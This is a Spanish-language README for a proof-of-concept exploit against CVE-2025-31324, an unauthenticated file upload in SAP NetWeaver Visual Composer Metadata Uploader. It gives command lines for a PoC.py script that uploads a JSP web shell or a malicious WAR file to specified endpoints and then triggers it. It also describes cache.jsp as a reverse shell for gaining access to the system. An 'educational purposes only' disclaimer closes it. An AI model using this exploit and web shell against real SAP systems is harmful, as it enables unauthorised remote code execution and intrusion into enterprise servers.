
Prueba de concepto para CVE-2025-31324: Subida no autenticada en SAP NetWeaver Visual Composer Metadata Uploader
Prueba de concepto para CVE-2025-31324: Carga no autenticada en SAP NetWeaver Visual Composer Metadata Uploader
Este script realiza:
Ejemplo de uso:
python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal
python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https
También tienes la posibilidad de subir un archivo .war si así es como prefieres ejecutarlo. cache.jsp es una reverse shell que te dará acceso una vez dentro del sistema. (Todavía estoy resolviendo problemas con eso)
Esto está pensado únicamente para fines educativos y no debe utilizarse para actividades maliciosas. Asegúrate siempre de tener los permisos necesarios y de seguir las pautas éticas al probar o investigar vulnerabilidades de seguridad.
Si tienes alguna pregunta o necesitas aclaraciones, no dudes en contactarme. ¡Mantente seguro y protegido!